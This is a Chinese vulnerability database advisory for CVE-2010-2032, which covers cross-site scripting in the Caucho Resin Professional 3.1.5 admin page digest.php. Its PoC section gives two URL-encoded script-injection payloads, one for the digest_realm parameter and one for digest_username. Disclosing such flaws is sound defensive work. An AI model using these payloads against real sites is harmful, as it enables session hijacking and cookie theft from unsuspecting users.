Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabili

基本字段

漏洞编号:
SSV-89274
披露/发现时间:
2010-05-24
提交时间:
2015-08-31
漏洞等级:
漏洞类别:
跨站脚本
影响组件:
Caucho resin
漏洞作者:
未知
提交者:
匿名
CVE-ID:
CVE-2010-2032
CNNVD-ID:
CNNVD-201005-338
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 匿名 共获得  0KB

CVE-2010-2032

Caucho Resin Professional is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

 

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

 

Resin Professional 3.1.5 is affected; other versions may also be affected.

共 2  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 匿名 共获得   0.65KB
1
2
http://www.example.com/resin-admin/digest.php?digest_attempt=1&digest_realm=%22%3E%3Cscript%3Ealert%28%22ZnVjayBjbnZk%22%29%3C%2fscript%3E%3Ca%26digest_username%5B%5D%3D
http://www.example.com/resin-admin/digest.php?digest_attempt=1&digest_username=%22%3E%3Cscript%3Ealert%28%22ZnVjayBjbnZk%22%29%3C%2fscript%3E%3Ca
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

kenan 共 7 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 2003
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负